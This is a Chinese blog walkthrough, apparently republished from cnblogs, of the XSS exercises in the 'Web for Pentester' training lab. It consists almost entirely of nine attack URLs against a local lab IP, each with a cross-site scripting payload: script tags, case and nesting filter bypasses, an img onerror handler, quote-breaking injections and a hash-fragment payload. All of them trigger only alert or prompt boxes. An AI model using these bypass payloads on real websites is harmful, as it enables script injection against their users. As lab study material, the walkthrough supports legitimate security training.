【渗透测试学习平台】 web for pentester -3.XSS

Example 1

http://192.168.91.139/xss/example1.php?name=hacker<script>alert('xss')</script>

Example 2

http://192.168.91.139/xss/example2.php?name=hacker<ScriPt>alert('xss')</ScriPt>

Example 3

http://192.168.91.139/xss/example3.php?name=hacker<scr<script>ipt>alert('xss')</scr</script>ipt>

Example 4

http://192.168.91.139/xss/example4.php?name=hacker1<img src="12" onerror=alert('xss') />

Example 5

http://192.168.91.139/xss/example5.php?name=hacker11<script>prompt(/xss/)</script>

Example 6

http://192.168.91.139/xss/example6.php?name=hacker";alert(/xss/);//

Example 7

http://192.168.91.139/xss/example7.php?name=hacker';alert(/xss/);//

Example 8

http://192.168.91.139/xss/example8.php/"method="POST"><script>alert(1)</script>

http://192.168.91.139/xss/example8.php/" onsubmit="alert('1')

Example 9

http://192.168.91.139/xss/example9.php#<script>alert(1)</script>

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

原文地址:https://www.cnblogs.com/xiaozi/p/5692316.html